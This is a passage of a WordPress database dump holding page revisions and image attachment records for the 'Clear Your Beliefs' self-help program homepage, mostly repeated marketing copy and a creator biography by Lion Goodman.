(1477, 2, '2014-10-07 20:16:54', '2014-10-08 01:16:54', '<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nStep 1<img class="aligncenter size-medium wp-image-1476" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="202" height="300" />\nStep 2Box content\nStep 3Box content\n<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p>Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><strong>Click HERE to Learn More</strong></p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-07 20:16:54', '2014-10-08 01:16:54', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1478, 2, '2014-10-07 20:26:49', '2014-10-08 01:26:49', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nStep 1<img class="aligncenter size-medium wp-image-1476" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="202" height="300" />\nStep 2Box content\nStep 3Box content\n<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p>Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><strong>Click HERE to Learn More</strong></p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-07 20:26:49', '2014-10-08 01:26:49', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1479, 2, '2014-10-07 20:28:22', '2014-10-08 01:28:22', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n<p>Step 1<img class="aligncenter  wp-image-1476" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" /></p>			Step 2Box content\nStep 3Box content\n<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p>Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><strong>Click HERE to Learn More</strong></p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-07 20:28:22', '2014-10-08 01:28:22', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1480, 2, '2014-10-07 20:29:16', '2014-10-08 01:29:16', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n<p>Step 1<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" /></p>			Step 2Box content\nStep 3Box content\n<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p>Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><strong>Click HERE to Learn More</strong></p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-07 20:29:16', '2014-10-08 01:29:16', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1481, 2, '2014-10-07 20:32:40', '2014-10-08 01:32:40', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n<p>Step 1<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" /></p><p>Step 1<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" /></p><p>Step 1<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" /></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p>Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><strong>Click HERE to Learn More</strong></p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-07 20:32:40', '2014-10-08 01:32:40', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1482, 2, '2014-10-07 20:55:12', '2014-10-08 01:55:12', '', 'download', '', 'inherit', 'closed', 'open', '', 'download', '', '', '2014-10-07 20:55:12', '2014-10-08 01:55:12', '', 1450, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png', 0, 'attachment', 'image/png', 0),
(1483, 2, '2014-10-07 20:56:04', '2014-10-08 01:56:04', '', 'btn_07', '', 'inherit', 'closed', 'open', '', 'btn_07', '', '', '2014-10-07 20:56:04', '2014-10-08 01:56:04', '', 1450, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png', 0, 'attachment', 'image/png', 0),
(1484, 2, '2014-10-07 20:56:09', '2014-10-08 01:56:09', '', 'btn_09', '', 'inherit', 'closed', 'open', '', 'btn_09', '', '', '2014-10-07 20:56:09', '2014-10-08 01:56:09', '', 1450, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png', 0, 'attachment', 'image/png', 0),
(1485, 2, '2014-10-07 20:57:07', '2014-10-08 01:57:07', '', 'btn_10', '', 'inherit', 'closed', 'open', '', 'btn_10', '', '', '2014-10-07 20:57:07', '2014-10-08 01:57:07', '', 1450, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png', 0, 'attachment', 'image/png', 0),
(1486, 2, '2014-10-07 20:58:05', '2014-10-08 01:58:05', '', 'btn_11', '', 'inherit', 'closed', 'open', '', 'btn_11', '', '', '2014-10-07 20:58:05', '2014-10-08 01:58:05', '', 1450, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_11.png', 0, 'attachment', 'image/png', 0),
(1488, 2, '2014-10-07 21:00:55', '2014-10-08 02:00:55', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n<p>Step 1</p><p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" /></p><p><a href="#"><img class="aligncenter size-full wp-image-1486" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_11.png" alt="btn_11" width="225" height="60" /></a></p><p></p><p>Step 1</p><p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></p><p style="text-align: center;"><strong>DOWNLOAD THE  iClearIt APP</strong></p><p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p><p></p><p>Step 1</p><p style="text-align: center"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p>Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><strong>Click HERE to Learn More</strong></p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-07 21:00:55', '2014-10-08 02:00:55', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1487, 2, '2014-10-07 20:58:22', '2014-10-08 01:58:22', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n<p>Step 1</p><p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" /></p><p><a href="#"><img class="aligncenter size-full wp-image-1486" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_11.png" alt="btn_11" width="225" height="60" /></a></p><p></p><p>Step 1</p><p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></p><p style="text-align: center"><strong>DOWNLOAD THE  iClearIt APP</strong></p><p style="text-align: center">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p><p></p><p>Step 1</p><p style="text-align: center"><strong>Learn about the</strong></p><p style="text-align: center"><strong><em>CLEAR YOUR BELIEFS</em></strong></p><p style="text-align: center"><strong> Program</strong></p><p style="text-align: center"><strong> </strong><strong>Clear Limiting and Negative Beliefs Permanently. </strong><strong>Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</strong></p><p><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a></p><p></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p>Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><strong>Click HERE to Learn More</strong></p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-07 20:58:22', '2014-10-08 01:58:22', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1489, 2, '2014-10-07 21:05:26', '2014-10-08 02:05:26', '', 'btn_03', '', 'inherit', 'closed', 'open', '', 'btn_03', '', '', '2014-10-07 21:05:26', '2014-10-08 02:05:26', '', 1450, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png', 0, 'attachment', 'image/png', 0),
(1490, 2, '2014-10-07 21:05:55', '2014-10-08 02:05:55', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n<p>Step 1</p><p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" /></p><p><a href="#"><img class="aligncenter size-full wp-image-1486" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_11.png" alt="btn_11" width="225" height="60" /></a></p><p></p><p>Step 2</p><p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></p><p style="text-align: center"><strong>DOWNLOAD THE  iClearIt APP</strong></p><p style="text-align: center">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p><p></p><p>Step 3</p><p style="text-align: center"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important;margin-top: 5px ! important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" 